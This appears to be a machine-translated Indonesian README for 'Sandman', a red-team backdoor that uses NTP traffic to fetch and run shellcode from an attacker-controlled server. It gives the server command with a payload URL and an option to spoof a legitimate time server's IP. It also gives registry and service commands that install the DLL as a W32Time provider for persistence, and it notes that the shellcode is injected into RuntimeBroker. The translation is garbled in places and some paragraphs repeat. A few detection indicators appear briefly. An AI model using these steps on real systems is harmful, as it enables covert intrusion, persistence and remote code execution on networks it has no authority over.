Sandman

Sandman adalah pintu belakang yang dimaksudkan untuk bekerja di jaringan yang dikeraskan selama keterlibatan tim merah.

Sandman bekerja sebagai stager dan memanfaatkan NTP (protokol untuk menyinkronkan waktu & tanggal) untuk mendapatkan dan menjalankan shellcode sewenang-wenang dari server yang telah ditentukan sebelumnya.

Karena NTP adalah protokol yang diabaikan oleh banyak bek yang mengakibatkan aksesibilitas jaringan yang luas.

Jalankan di mesin Windows / *Nix:

python3 sandman_server.py " Network Adapter " " Payload Url " " optional: ip to spoof "

• Adaptor Jaringan: Adaptor yang Anda ingin server mendengarkan (misalnya Ethernet untuk Windows, eth0 untuk *nix).

• URL Payload: URL ke shellcode Anda, bisa menjadi agen Anda (misalnya, Cobaltstrike atau Meterpreter) atau Stager lain.

• IP TO BPOOF: Jika Anda ingin memalsukan alamat IP yang sah (misalnya, Alamat IP Time.microsoft.com).

Untuk memulai, Anda dapat mengkompilasi SandManBackdoor seperti yang disebutkan di bawah ini, karena ini adalah satu -satunya C# yang dapat dieksekusi Anda dapat menjalankannya melalui ExecuteAssembly, menjalankannya sebagai penyedia NTP atau hanya mengeksekusi/menyuntikkannya.

Untuk menggunakannya, Anda harus mengikuti langkah -langkah sederhana:

• Tambahkan nilai registri berikut:

 reg add " HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeTimeProvidersNtpClient " /v DllName /t REG_SZ /d " C:PathToTheDll.dll "

• Mulai ulang layanan W32Time:

 sc stop w32time
sc start w32time

Catatan: Pastikan Anda menyusun dengan opsi X64 dan bukan opsi CPU!

• Mendapatkan dan menjalankan muatan sewenang -wenang dari server yang dikendalikan penyerang.

• Dapat bekerja pada jaringan yang dikeraskan karena NTP biasanya diizinkan di FW.

• Menyamar sebagai server NTP yang sah melalui spoofing IP.

• Python 3.9

• Persyaratan ditentukan dalam file persyaratan.

Untuk mengkompilasi backdoor saya menggunakan Visual Studio 2022, tetapi seperti yang disebutkan di bagian penggunaan itu dapat dikompilasi dengan VS2022 dan CSC. Anda dapat mengkompilasinya baik menggunakan use_shellcode dan menggunakan orca's shellcode atau tanpa use_shellcode untuk menggunakan WebClient.

Untuk mengkompilasi backdoor saya menggunakan Visual Studio 2022, Anda juga perlu menginstal Dllexport (melalui Nuget atau cara lain) untuk mengkompilasinya. Anda dapat mengkompilasinya baik menggunakan use_shellcode dan menggunakan orca's shellcode atau tanpa use_shellcode untuk menggunakan WebClient.

• Kode shell disuntikkan ke RuntimeBroker.

• Komunikasi NTP yang mencurigakan dimulai dengan header ajaib yang dikenal.

• Aturan yara.

• Orca untuk shellcode.

• Terima kasih khusus kepada Tim McGuffin untuk ide penyedia waktu.

Terima kasih kepada mereka yang sudah berkontribusi dan saya akan dengan senang hati menerima kontribusi, membuat permintaan tarik dan saya akan memeriksanya!